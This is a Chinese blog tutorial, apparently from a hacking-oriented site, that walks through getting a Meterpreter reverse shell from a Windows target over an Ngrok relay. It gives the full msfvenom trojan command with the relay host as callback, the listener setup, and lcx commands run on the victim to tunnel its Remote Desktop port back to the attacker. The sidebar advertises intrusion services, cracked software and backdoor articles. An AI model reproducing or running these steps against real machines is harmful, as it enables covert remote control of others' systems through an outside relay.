相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!
Kali地址:192.168.61.130(攻击机地址)
靶机win2008: 192.168.61.134(模拟外网私人地址)
中间跳板ngrok :vipgz4.idcfengye.com
工具:lcx windows版与linux版
一、反弹shell到本地
1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)
2.在kali下构造生成反弹木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe
Lhost:为Ngrok服务地址
Lport:为Ngrok分配的隧道端口
3.在Kali中运行Ngrok的客户端:
./sunny clientid Ngrok的ID号
4.Kali攻击机配置监听:
此处的lhost与lport与Ngrok中的配置相同,并开始监听。
5.将生成的木马放到靶机运行:
成功得到通过中转反弹过来的shell。
PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。
二、转发3389端口到本地
1.在Kali中执行lcx监听和转发命令:
./portmap -m 2 -p1 8848 -p2 33891
P1为本地监听的端口(与ngrok转发的端口一致)
P2为本地转发的端口(随便命名,但不能是已被占用的端口)
2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:
lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389
slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口
看到ngrok客户端多出回弹的消息
3.开始在Kali中连接远程桌面连接:
rdesktop 127.0.0.1:33891
至此我们已经成功连接上了3389远程桌面。由于全程都在一台本地kali环境中操作,且只用了一条Ngrok隧道大大减少了成本。
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- 美国大型成人网站遭黑,4.12亿用户数据曝光
- 星外虚拟主机跨web目录文件读取技巧
- 渗透工具BackTrack与KaliLinux全套视频教程
- php 打包网站在线压缩为zip
- burpsuite_pro_v1.7.11破解版(含下载地址)
- Winmail最新直达webshell 0day漏洞挖掘实录
- 韩顺平PHP新手入门149讲完整
- 批量S2-045漏洞检测及利用
- Docker出漏洞:端口2375【附案例】
- 渗透Hacking Team过程
- 浅谈高级组合技打造“完美” 捆绑后门
- 某司SSL-VPN沙盒逃逸之旅
- Mimikatz 非官方指南和命令参考_Part1
- Microsoft Outlook 漏洞:可允许远程代码执行
- 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备
- 域渗透的金之钥匙
- 巧用DSRM密码同步将域控权限持久化
- Hash传递攻击Windows2012远程桌面
- 为指定用户添加Windows特权的代码
- 别以为有vpn我找不到你(网警抓人全过程)
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-